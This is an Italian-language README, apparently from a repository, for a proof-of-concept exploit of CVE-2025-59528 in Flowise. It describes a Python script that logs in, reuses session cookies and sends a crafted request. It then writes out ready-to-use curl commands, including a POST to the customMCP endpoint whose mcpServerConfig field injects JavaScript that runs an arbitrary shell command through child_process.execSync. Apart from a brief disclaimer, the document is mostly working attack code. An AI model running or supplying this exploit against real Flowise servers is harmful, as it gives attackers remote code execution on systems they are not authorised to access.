
CVE-2025-59528 Prova di concetto
Script Python proof-of-concept per attivare il percorso RCE CustomMCP di Flowise tramite POST /api/v1/node-load-method/customMCP.
⚠️ Solo a scopo educativo e per ricerca sulla sicurezza autorizzata. Eseguire questo strumento contro sistemi che non possiedi o per i quali non hai il permesso scritto di testare è illegale.
im-soohyun (Kim SooHyun)CVE-2025-595283.0.53.0.6poc.py: richiede URL/IP della macchina, protocollo opzionale quando si usa host/IP nudo, email, password e comando; esegue l'accesso, riutilizza i cookie, poi invia una richiesta CustomMCP appositamente costruita e stampa lo stato HTTP, gli header e il corpo della risposta in modo simile a curl -iEsegui:
python3 poc.py
Quindi fornisci:
10.10.11.10, http://10.10.11.10 o https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'